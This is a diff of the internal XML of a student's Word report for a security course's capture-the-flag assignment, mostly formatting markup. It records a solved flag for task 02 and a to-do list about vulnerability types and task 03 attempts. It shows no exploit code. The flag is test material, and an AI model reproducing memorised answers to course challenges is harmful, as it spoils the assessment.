+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5972810" cy="1275715"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>As the output shows, the flag for task 0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+        <w:t>INF226{</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+        <w:t>s3r1nu5_s3r1nu5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
         <w:t>TASK 03</w:t>
       </w:r>
     </w:p>
@@ -6424,9 +6784,11 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38653337" wp14:editId="61E2F44D">
             <wp:extent cx="5972810" cy="4277360"/>
@@ -6443,7 +6805,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
+                    <a:blip r:embed="rId19"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6524,10 +6886,10 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51EA301D" wp14:editId="6CEB0FF4">
             <wp:extent cx="5972810" cy="3073400"/>
@@ -6544,7 +6906,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
+                    <a:blip r:embed="rId20"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -6596,6 +6958,7 @@
           <w:kern w:val="0"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Is the </w:t>
       </w:r>
       <w:r>
@@ -6618,8 +6981,8 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId20"/>
-      <w:footerReference w:type="default" r:id="rId21"/>
+      <w:headerReference w:type="default" r:id="rId21"/>
+      <w:footerReference w:type="default" r:id="rId22"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -7699,7 +8062,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="001F34F3"/>
+    <w:rsid w:val="00930E42"/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Heading1">
     <w:name w:val="heading 1"/>
@@ -7868,12 +8231,57 @@
     <w:name w:val="Hyperlink"/>
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:rsid w:val="0031552A"/>
     <w:rPr>
       <w:color w:val="0000FF"/>
       <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="UnresolvedMention">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="001A1A85"/>
+    <w:rPr>
+      <w:color w:val="605E5C"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Title">
+    <w:name w:val="Title"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:link w:val="TitleChar"/>
+    <w:uiPriority w:val="10"/>
+    <w:qFormat/>
+    <w:rsid w:val="00826515"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      <w:contextualSpacing/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:spacing w:val="-10"/>
+      <w:kern w:val="28"/>
+      <w:sz w:val="56"/>
+      <w:szCs w:val="56"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
+    <w:name w:val="Title Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Title"/>
+    <w:uiPriority w:val="10"/>
+    <w:rsid w:val="00826515"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:spacing w:val="-10"/>
+      <w:kern w:val="28"/>
+      <w:sz w:val="56"/>
+      <w:szCs w:val="56"/>
     </w:rPr>
   </w:style>
 </w:styles>
@@ -8175,23 +8583,6 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
-<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
-  <documentManagement>
-    <_activity xmlns="96aa0b68-977f-4d68-9084-1e0376ff8ae9" xsi:nil="true"/>
-  </documentManagement>
-</p:properties>
-</file>
-
-<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
-</file>
-
-<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
 <ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Document" ma:contentTypeID="0x0101007BCD34C5F2D32C4AAAB044270ECA57DA" ma:contentTypeVersion="9" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="63e273ac3b51b78697e2c3ceb21950bb">
   <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="96aa0b68-977f-4d68-9084-1e0376ff8ae9" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="1452b4192b6f4abe265f2bac6a64a404" ns3:_="">
     <xsd:import namespace="96aa0b68-977f-4d68-9084-1e0376ff8ae9"/>
@@ -8369,25 +8760,24 @@
 </ct:contentTypeSchema>
 </file>
 
-<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{654B8BEF-E3F8-4FF9-8A76-CDEC00BB12AB}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
-    <ds:schemaRef ds:uri="96aa0b68-977f-4d68-9084-1e0376ff8ae9"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
+<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
 </file>
 
-<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0CB023CB-C7AB-4C92-9D10-9255653953CE}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
+<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
+<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
+  <documentManagement>
+    <_activity xmlns="96aa0b68-977f-4d68-9084-1e0376ff8ae9" xsi:nil="true"/>
+  </documentManagement>
+</p:properties>
 </file>
 
-<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4C90A798-53B0-4DA2-8331-5495FD97601A}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/contentType"/>
@@ -8403,4 +8793,22 @@
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/internal/obd"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0CB023CB-C7AB-4C92-9D10-9255653953CE}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{654B8BEF-E3F8-4FF9-8A76-CDEC00BB12AB}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
+    <ds:schemaRef ds:uri="96aa0b68-977f-4d68-9084-1e0376ff8ae9"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
--- a/CA1/CA1_INF226_fha040.docx
+++ b/CA1/CA1_INF226_fha040.docx
@@ -2,6 +2,219 @@
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:body>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+        <w:t>Before hand-in:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+        <w:t>Fill out vuln. Types</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+        <w:t>The b’24’ in 02</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+        <w:t>Try to think back on 03, write what you’ve attempted</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Incl. the pseudocode approach, and the other one mentioned by Hadi. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+        <w:t>See what else people have suggested on discord</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
